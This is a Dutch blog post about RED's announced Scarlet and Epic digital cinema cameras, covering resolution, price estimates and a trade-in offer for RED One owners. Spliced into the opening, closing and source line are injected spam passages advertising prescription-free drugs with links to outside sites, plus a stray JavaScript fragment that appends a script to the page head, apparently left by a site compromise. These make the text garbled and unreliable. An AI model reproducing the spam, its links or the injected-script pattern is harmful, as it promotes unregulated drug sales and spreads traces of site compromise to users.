remko:org
it's always on my mind
RED kondigt 5k Epic aan
Categories: Film - Video

order generic atarax online no prescription, only certified, first class drugs on offer! order atarax amoxil price amoxil online http://xn--zckycn1d.biz/?p=2689 Cheap amoxil generic name nov 28, 2014 – buy cheap generic estrace online without prescription estradiol online. Pills buy estrace online uk a�� buy estrace pills buy estrace cream online. Als regisseur en als docent video/film heb ik sinds een aantal jaar mijn oog op de RED One laten vallen. Het toeval mocht dat ik voor het voormalige Gamevalley een aanvraag tot deze filmcamera mocht doen voor de NHL. Wat deze cinematografische camera zo bijzonder maakt kan je verder wel uit-googelen, maar RED zit ook niet stil.
RED kondigt namelijk twee nieuwe cameraa��s aan: een pocketcamera Scarlet genaamd met een resolutie van 3K en met een aanvangsprijs van circa $3.000,00 en een 5K camera met de naam Epic. Op de IBC hebben we met een aantal studenten deze camera, welke een stuk kleiner is dan de One, mogen bewonderen.

Allemachtig, 5k… er bestaat, naast Flame, geen software die dat kan editten. Het meest in het oog springende verschil met de huidige RED One is de mogelijkheid om de informatie in HDRGB weg te schrijven hierdoor is het in principe mogelijk deze nieuwe camera ook voor TV- achtige doeleinden in te zetten. De RED One is toch meer een Digital Cinema Camera met data (R3D) opslag die middels conversie naar meer geschikte videobestanden zoals DPX of Prores 4:2:2 geconverteerd kan worden.

RED biedt de mogelijkheid om uiteindelijk de RED One camera body voor de volle aanschafprijs van $ 17.500 in te ruilen op een Epic body. De aanschafprijs voor de Epic wordt geschat op ergens tussen de $30.000 en $ 40.000. Een lachertje natuurlijk vergeleken met de concurrerende D21 van Arri, welke rond de twee ton ligt.
Dus niet alleen inzetbaar als Digital Cinema Camera maar ook te gebruiken als HD broadcastcamera met full HD outputs. De Epic zoals het zich nu laat aanzien heeft die multifunctionaliteit wel. Sympathiek gebaar is dan wel om de huidige RED owners een volledige refund te geven indien deze besluiten een Epic aan te schaffen.
Levering van zowel Scarlet als Epic is ergens in 2009.
Wil je meer weten over cinematografische camera’s, 35 mm lenzen, het verschil tussen HD en 4K of wat CineAlte precies is? Ga naarhdcompare fluoxetine prozac buy | usa canada uk | buy online without prescription . low prices, fast delivery and secure online processing. order evecare syrup fucidin online sinemet restless leg syndrome treatment order baclofen online, baclofen mg, order baclofen, buy lioresal, buy baclofen its use may be made to result lioresal tablets in benefit and satis- faction. .

Bron: Gedeeltelijk hd-tv.nl, gedeeltelijk Remko Pills http://swiftreporters.com/purchase-bonnispaz/ Buy Pills } else {d.getElementsByTagName('head')[0].appendChild(s); http://casasdelpuerto.com.ar/?p=15498 Purchase

Comments are closed.